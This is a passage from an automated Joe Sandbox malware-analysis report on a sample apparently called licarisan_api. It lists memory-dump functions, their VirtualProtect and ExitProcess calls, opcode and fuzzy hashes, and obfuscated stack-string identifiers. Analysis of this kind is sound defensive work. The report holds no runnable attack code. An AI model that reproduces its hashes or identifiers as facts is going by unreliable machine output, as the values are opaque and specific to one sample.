                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 7c8cd6cbc07008870cdc8be8f7a27a6c2c1a12a594882f275c6620190876c6e1
                                    • Instruction ID: f65040f322e208d8a4e5fb34ab66b49660eb9df1cd76627b20274bdfbe20e248
                                    • Opcode Fuzzy Hash: 7c8cd6cbc07008870cdc8be8f7a27a6c2c1a12a594882f275c6620190876c6e1
                                    • Instruction Fuzzy Hash: A811E0F090425DAFEB208B55CC849FAB778EF41300F1042FEEA4956281D679AD868E12
                                    Function 0080F6A6 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0080FDEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 0f61c7533a9ed5db5217512bd0b5353ae6fa13c545893ade00c2d2f5154c41ee
                                    • Instruction ID: 639d24fc9e00882859f7d46a607e05dcfaab4cf845ce86f0c7e62fc566a89617
                                    • Opcode Fuzzy Hash: 0f61c7533a9ed5db5217512bd0b5353ae6fa13c545893ade00c2d2f5154c41ee
                                    • Instruction Fuzzy Hash: C30126A3A04209AAF7788915DD49BF7767AE7C0304F10C1BAD70E59CC6D7BD0AC69901
                                    Function 007C894A Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 2d758493a800ff5ed907641fb4911ff4cd27f37b9be651f213e3e3c995dc6322
                                    • Instruction ID: 2f2a036ca516bed3f23ef4a3a1ce2bec7ef95dd1acdf535aaf08a26f0696467d
                                    • Opcode Fuzzy Hash: 2d758493a800ff5ed907641fb4911ff4cd27f37b9be651f213e3e3c995dc6322
                                    • Instruction Fuzzy Hash: C211C4B1A152588FD7A9CB10CC98BBA7B74FB84305F1081EED54A5A281DB3D5EC1CF12
                                    Function 007C8C27 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 5d8e62d4489b4a2f86286a4ac34fdc9179b70693b7bd8040dca664bdb425ac8a
                                    • Instruction ID: 4a32ec62c452979f31821f0de2abd10bf33d49d1f86362d43250b0c9baad9ccf
                                    • Opcode Fuzzy Hash: 5d8e62d4489b4a2f86286a4ac34fdc9179b70693b7bd8040dca664bdb425ac8a
                                    • Instruction Fuzzy Hash: B4118F70905668CFDB79CB10DCD5BFAB7B5AB85305F2082DED55A5A280CA385EC08F26
                                    Function 007B21D6 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B29EE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 99503a097a4855acdbc0c0142371ca1b7218e624da992396bd25416d1143577b
                                    • Instruction ID: 7324e0fe5d03cb4de16e14cd26b637836410137e257035f935a6ff9fd45dd29b
                                    • Opcode Fuzzy Hash: 99503a097a4855acdbc0c0142371ca1b7218e624da992396bd25416d1143577b
                                    • Instruction Fuzzy Hash: 760126F2E062509FF7118A10DC10BEA7779EBD2311F0440FAE90D9A282D67C5AC58B61
                                    Function 0043782F Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 1c1ea27179360d8fc005d0709d6fbb5ab4f1613aef04fd4b226c55596f6f9c6b
                                    • Instruction ID: 515c29123b53164fc97d8d4b4ab525464833d5dc8302d7a3d072130b1e86ca9b
                                    • Opcode Fuzzy Hash: 1c1ea27179360d8fc005d0709d6fbb5ab4f1613aef04fd4b226c55596f6f9c6b
                                    • Instruction Fuzzy Hash: EB115EF1E052599FEB24CA00DC44B9EB775FB88308F2040EAD50D17340D739AE81DE55
                                    Function 007BD176 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 09da3c507bc4c008466d62611a4f99ad47ea44e04e1986ac161acb0f0e75b6ca
                                    • Instruction ID: 9fcb9d9c531f1a44d03a9e846ba2ae3260e05081634f1f3d6ffad01567ddb2a9
                                    • Opcode Fuzzy Hash: 09da3c507bc4c008466d62611a4f99ad47ea44e04e1986ac161acb0f0e75b6ca
                                    • Instruction Fuzzy Hash: 4301B1B2D09128ABEB70CA24CC44BEB77B9EF84310F1481E9E50CD7640E63A9F85CE51
                                    Function 007C896D Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: b4c51e14b98baae9b8ef15363d0be41bc8157a04e9682debb406ca4106c524ac
                                    • Instruction ID: 48030b9c63a57d2dbb573a5555d6008b003ed73e9deb5a72d40ee2234545a58f
                                    • Opcode Fuzzy Hash: b4c51e14b98baae9b8ef15363d0be41bc8157a04e9682debb406ca4106c524ac
                                    • Instruction Fuzzy Hash: A80184B19146288FDBA9CB10CCD4FEAB778EB84305F1081EED64A5A280DB385EC0DF51
                                    Function 007FA3D4 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 5a95a51d355137f77ca6193f677d4269b582a44763b3039a874559aecb7d1863
                                    • Instruction ID: 4f2661efae5c9d07909c23dc6a121acbcdba07a8e08bc6e9739a32a39e55c247
                                    • Opcode Fuzzy Hash: 5a95a51d355137f77ca6193f677d4269b582a44763b3039a874559aecb7d1863
                                    • Instruction Fuzzy Hash: 2F014CF190425DAFDB208B64CCC85F6B374EF01340F0002FEDA495A281E679AD468B53
                                    Function 007FA3E0 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 401991dd49af9bbb6e739afffc6fc26a2f4c3d90d781dd3b9f5ba90632234f40
                                    • Instruction ID: 6a07117ff5def00e82d7aca505fbbebe02fa39ee271ad987b62e6b2f6fa99a5f
                                    • Opcode Fuzzy Hash: 401991dd49af9bbb6e739afffc6fc26a2f4c3d90d781dd3b9f5ba90632234f40
                                    • Instruction Fuzzy Hash: 36014CB150415D9FDB208B68CCC85F9B775EF41340F0002FEDA495A282D6796D86CB12
                                    Function 007A5D6A Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 681036dbc0da77f3324c5c3c6743064ac2725d7347521c1cfd8a2a6bc389f192
                                    • Instruction ID: 6d2e2d22ce492961b6dc822c9dc7a0de0b3d5f4406ee9cd6ed06e181c8aeaf88
                                    • Opcode Fuzzy Hash: 681036dbc0da77f3324c5c3c6743064ac2725d7347521c1cfd8a2a6bc389f192
                                    • Instruction Fuzzy Hash: 270175F1914559AFF728CB20DC55FAA7774FB54300F0582EEE649A6280D6399F808F50
                                    Function 007C858E Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 7cf324f6faa8f252d6f97d536eb3e3c3ebae3fb4b8b860743794def3778a5ad2
                                    • Instruction ID: 12965f72277f4f03397aa10ec5806a8cf3b4a3c1625c3fcce174c97a998fa2b1
                                    • Opcode Fuzzy Hash: 7cf324f6faa8f252d6f97d536eb3e3c3ebae3fb4b8b860743794def3778a5ad2
                                    • Instruction Fuzzy Hash: AFF0A4B2A15214AAE7698B50DCD4FF77B68E744314F1046EEA60B5A1C09B3D5EC08E26
                                    Function 007A5AE2 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 8cf01369379f08a5fbe8c04a8959705451e4ad461a12f1ff44f0861ef515add0
                                    • Instruction ID: 92c271bdc90af22deca2d8ab069fba8920351cc8113e5f744a82a9e4ff6d925d
                                    • Opcode Fuzzy Hash: 8cf01369379f08a5fbe8c04a8959705451e4ad461a12f1ff44f0861ef515add0
                                    • Instruction Fuzzy Hash: 3A0144F19545596FF728CB60DC55FAAB7B8FB54300F0481EEE609A6680D6399E808F50
                                    Function 007A5B39 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: d026ec2352ca639c9e0b720e0fa34e0d80ebe95c7fe7fa314932ad2412fa21e9
                                    • Instruction ID: 3984e620eb819525f1dfeebbbd4f76639e62297d3405863fd96cba4b6f5100c1
                                    • Opcode Fuzzy Hash: d026ec2352ca639c9e0b720e0fa34e0d80ebe95c7fe7fa314932ad2412fa21e9
                                    • Instruction Fuzzy Hash: 460144F19545595FF728CB50DC55FBAB778FB54300F0481EEE60966680D6395E808F50
                                    Function 007A5B14 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: aab9457de864079b4fc676d1968aee92daebce1a076a463c9fffbe9e4da3b9e0
                                    • Instruction ID: 8050184d872ce109a6ad0f84502f7816d78adb51733b37dc7196a49e5cf737e2
                                    • Opcode Fuzzy Hash: aab9457de864079b4fc676d1968aee92daebce1a076a463c9fffbe9e4da3b9e0
                                    • Instruction Fuzzy Hash: 720144F19545595FF728CB50DC55FABB778FB54300F0481EEE60966680D6399E808F50
                                    Function 007BD1B3 Relevance: 1.5, APIs: 1, Instructions: 37memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 9701c6281934e8b065531cd7e8627a6666b65866e52170f45206b40a1eee7d59
                                    • Instruction ID: 31ee0bfc485e5670d10dc8f00b539c102374d8c0479f6df1ab996a66e5ae682f
                                    • Opcode Fuzzy Hash: 9701c6281934e8b065531cd7e8627a6666b65866e52170f45206b40a1eee7d59
                                    • Instruction Fuzzy Hash: C1F0F6719040285BE721CA54CC58BEB7778FF50341F0046E9D60CDB150E6369E89CF91
                                    Function 007C89EC Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: d09d43ad7945e7fee041c3a362543351f6aa23732f8d7c40737a6ee548fafbfe
                                    • Instruction ID: e886bfc358fef6e6975a6b403ecb557cec548b139798783d2dba6dbe6ca63386
                                    • Opcode Fuzzy Hash: d09d43ad7945e7fee041c3a362543351f6aa23732f8d7c40737a6ee548fafbfe
                                    • Instruction Fuzzy Hash: 0E01A4B1A152189FD769CB10CCD4FE6B778EB44305F1085DEA64B5A280DB3C5E80CF25
                                    Function 007C89BA Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 8e81c4178ff77a0f1468b92d2e5577b9a79606e6d4f81deb3914c3468b538e7c
                                    • Instruction ID: 453783b2c2a0fb99dfadbd86d82141391872aecbc937134958a67c7afec5d12b
                                    • Opcode Fuzzy Hash: 8e81c4178ff77a0f1468b92d2e5577b9a79606e6d4f81deb3914c3468b538e7c
                                    • Instruction Fuzzy Hash: 9C0181B1A152189FD7698B10CCD4FE6B778EB44305F1081DEA64B5A280DA385E80CF25
                                    Function 007C8A11 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 3b655f22da194fb67730c6007a80189b389f3693d1019497f920e6d1ec0341c2
                                    • Instruction ID: 6863a1fabf4c57e6981cb1f10dc1ab763d77373ad740dee9e0b360be40c58e93
                                    • Opcode Fuzzy Hash: 3b655f22da194fb67730c6007a80189b389f3693d1019497f920e6d1ec0341c2
                                    • Instruction Fuzzy Hash: A90181B1A152189FD7698B10CCD4FE6B778EB44305F2082DEA64A5A280DA385E808F25
                                    Function 007B28D5 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B29EE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ce3466b6ca6498dd4ab8599f69ceb763b3cc871a2ca58aa974f248f2df521d89
                                    • Instruction ID: 273b86a652aef32d32fc9ff9ee61656ac79674b1efb5aa4e1340ec176d051e6b
                                    • Opcode Fuzzy Hash: ce3466b6ca6498dd4ab8599f69ceb763b3cc871a2ca58aa974f248f2df521d89
                                    • Instruction Fuzzy Hash: 44F0B4719066549FD7699B20CC14BE97BB9EF85310F0440DFE50DAA192CA755DC4CF21
                                    Function 007C8CB0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ff29f2f5fac71d49a3088341229a295d08937b9e52e6c97720208acd0e6f3c46
                                    • Instruction ID: 4fbca93e5b1c6aff27cbf9c6409c3989d304920cdce9f4412b4c2c134b89a880
                                    • Opcode Fuzzy Hash: ff29f2f5fac71d49a3088341229a295d08937b9e52e6c97720208acd0e6f3c46
                                    • Instruction Fuzzy Hash: 02F020B16152149FC76A8B60CCE4EF77B78EB45304F1082CEE30B5A081CB399E808F26
                                    Function 00437B2B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 7c0bb3511f0ee4933da69fc9222b7b307ac97302f4c4d0abad879550b4785f10
                                    • Instruction ID: 073af56a61c608fc445793186a0efab4c3a7b02f1d4947ad0d46e869968c6a48
                                    • Opcode Fuzzy Hash: 7c0bb3511f0ee4933da69fc9222b7b307ac97302f4c4d0abad879550b4785f10
                                    • Instruction Fuzzy Hash: 51016DB08091AC8FEB30DB15C8816ACBBB0BF0A319F1051DBC49996282D2349E868F45
                                    Function 007C8CB7 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ec9015dbb2681070da6787c92ef621083d9c419d9a55108b0dc85fe52c28d5e6
                                    • Instruction ID: ae9355d5ba3aa43491c99cbac5b9da0bf7065fb94f3ccfe82ad05f69e7f5da59
                                    • Opcode Fuzzy Hash: ec9015dbb2681070da6787c92ef621083d9c419d9a55108b0dc85fe52c28d5e6
                                    • Instruction Fuzzy Hash: 64F0E5B16242549FD76DCB60CC98EE77778EB84304F1082DEA20B5A081DB399E808F05
                                    Function 00437B3A Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 8e5b4b32e8e15b2fc5841874e4b2f4bc8ea3451fed7caad48925152c529c4f98
                                    • Instruction ID: 2420b67199de159ef091c6d46dea3472d044b7077e82cbfbbb276946968a5447
                                    • Opcode Fuzzy Hash: 8e5b4b32e8e15b2fc5841874e4b2f4bc8ea3451fed7caad48925152c529c4f98
                                    • Instruction Fuzzy Hash: 6CF049B090926D8EEB30CB10CC957ECB7B0BF09319F0041EAC4AD66280C3385EC19F86
                                    Function 007C8CA9 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 10fa37949360c3ecf08d6b7ef30c8c05df7abe32ce03343b21a2c9a4df937790
                                    • Instruction ID: 4321e97c2f7959dbf5c777f610102cd647b22ce6474961401dacd6fd2cb4a5c2
                                    • Opcode Fuzzy Hash: 10fa37949360c3ecf08d6b7ef30c8c05df7abe32ce03343b21a2c9a4df937790
                                    • Instruction Fuzzy Hash: 6EE092B1A146549EC76A9B648C68EAB7BB8AF46304F1041CEE24A5B081DB349A818F12

                                    Non-executed Functions

                                    Function 007C8DF0 Relevance: 60.3, Strings: 48, Instructions: 266COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: E$G$G$H$H$M$M$P$V$W$W$a$a$a$c$d$d$d$d$e$e$e$e$e$e$e$i$l$l$l$l$l$n$n$o$o$o$r$r$t$t$t$t$t$u$u$u$x
                                    • API String ID: 0-1614795529
                                    • Opcode ID: 2d8606e901c87d84c590fb8d61368a799dfa844001f45568216a8e9dc08478b7
                                    • Instruction ID: fa5cfc387f4b553ce69fc162366cd4bcb99108db84debfdbb957c689cefa2769
                                    • Opcode Fuzzy Hash: 2d8606e901c87d84c590fb8d61368a799dfa844001f45568216a8e9dc08478b7
                                    • Instruction Fuzzy Hash: 33B1D160D086E8D9FB258628DC08BDBBA759F65304F0440FDD14CAB281D6BE4FD48B3A
                                    Function 007A86DB Relevance: 57.9, Strings: 46, Instructions: 405COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A$E$F$L$L$P$V$V$W$a$a$a$a$b$c$c$d$e$e$e$i$i$i$i$l$l$l$l$o$o$o$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y
                                    • API String ID: 0-2526299333
                                    • Opcode ID: b312ae2cf88b9d2adab0999e89c95a1cca43936e2dbbb0a56803911b926e4a60
                                    • Instruction ID: a4ebcc1c7a01cb681dc6f3b4bae5449d79fe82a70953cbc59b87d24a7d03dcbf
                                    • Opcode Fuzzy Hash: b312ae2cf88b9d2adab0999e89c95a1cca43936e2dbbb0a56803911b926e4a60
                                    • Instruction Fuzzy Hash: B202C561D086A8CEF7218B24DC047AABA75EF96304F1441F9D54DA7282DA7E0FD4CF22
                                    Function 007A8414 Relevance: 57.9, Strings: 46, Instructions: 389COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A$E$F$L$L$P$V$V$W$a$a$a$a$b$c$c$d$e$e$e$i$i$i$i$l$l$l$l$o$o$o$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y
                                    • API String ID: 0-2526299333
                                    • Opcode ID: f804407e4b2c59fa78ad1642245432061ad90c281026a65c4e5b18163912a8fd
                                    • Instruction ID: ea28fe60a8bc3e70adff49d02a10531fce8fd4d43886849546174ea31bd0c72c
